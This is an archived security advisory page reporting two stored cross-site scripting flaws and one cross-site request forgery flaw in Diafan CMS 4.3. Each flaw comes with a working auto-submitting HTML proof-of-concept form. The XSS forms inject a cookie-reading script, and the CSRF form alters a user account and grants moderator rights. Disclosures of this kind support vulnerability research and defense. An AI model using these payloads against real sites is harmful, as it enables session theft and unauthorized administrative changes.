exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Diafan CMS 4.3 Cross Site Request Forgery / Cross Site Scripting

Diafan CMS 4.3 Cross Site Request Forgery / Cross Site Scripting
Posted Jan 11, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

Diafan CMS version 4.3 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 551fffb8b6621732a0e7acd0fa4eb6f8eff051d3c6161ce5c63cf17c06388217

Diafan CMS 4.3 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
======================================
Vulnerability ID: HTB22776
Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_diafan_cms.html
Product: diafan.CMS
Vendor: Diafan ( http://www.diafan.ru/ )
Vulnerable Version: 4.3 and probably prior versions
Vendor Notification: 28 December 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "http://host/admin/site/save2/" script to properly sanitize user-supplied input in "text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/site/save2/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="noOut" value="1">
<input type="hidden" name="save_post" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="name" value="page name">
<input type="hidden" name="act" value="1">
<input type="hidden" name="actm" value="1">
<input type="hidden" name="title_meta" value="title">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="descr" value="">
<input type="hidden" name="rewrite" value="sef_url">
<input type="hidden" name="addmodule" value="">
<input type="hidden" name="parent_id" value="">
<input type="hidden" name="sort" value="2">
<input type="hidden" name="theme" value="">
<input type="hidden" name="othurl" value="">
<input type="hidden" name="text" value='content html"><script>alert(document.cookie)</script>'>
</form>
<script>
document.main.submit();
</script>


======================================
Vulnerability ID: HTB22777
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_diafan_cms.html
Product: diafan.CMS
Vendor: Diafan ( http://www.diafan.ru/ )
Vulnerable Version: 4.3 and probably prior versions
Vendor Notification: 28 December 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "http://host/admin/usersite/save2/" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/usersite/save2/" method="post" name="main" enctype="multipart/form-data" >

<input type="hidden" name="noOut" value="1">
<input type="hidden" name="save_post" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="fio" value="first name">
<input type="hidden" name="name" value="userlogin">
<input type="hidden" name="password" value="">
<input type="hidden" name="mail" value="email@example.com">
<input type="hidden" name="created" value="23.12.2010">
<input type="hidden" name="act" value="1">
<input type="hidden" name="moderator" value="1">
<input type="hidden" name="language" value="">
<input type="hidden" name="phone" value="phone">
<input type="hidden" name="city" value="city">
<input type="hidden" name="street" value="street">
<input type="hidden" name="home" value="5">
<input type="hidden" name="corps" value="">
<input type="hidden" name="flat" value="98">

</form>
<script>
document.main.submit();
</script>


======================================
Vulnerability ID: HTB22775
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_diafan_cms.html
Product: diafan.CMS
Vendor: Diafan ( http://www.diafan.ru/ )
Vulnerable Version: 4.3 and probably prior versions
Vendor Notification: 28 December 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "http://host/admin/news/saveNEWS_ID/" script to properly sanitize user-supplied input in "descr" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/news/saveNEWS_ID/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="noOut" value="1">
<input type="hidden" name="save_post" value="1">
<input type="hidden" name="id" value="NEWS_ID">
<input type="hidden" name="name" value="news name">
<input type="hidden" name="created" value="23.12.2010 09:02">
<input type="hidden" name="photo" value="">
<input type="hidden" name="act" value="1">
<input type="hidden" name="tag" value="">
<input type="hidden" name="title_meta" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="descr" value='desc"><script>alert(document.cookie)</script>'>
<input type="hidden" name="rewrite" value="">
<input type="hidden" name="site_id" value="5">
<input type="hidden" name="anons" value='announce'>
<input type="hidden" name="text" value="news_text">
</form>
<script>
document.main.submit();
</script>


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close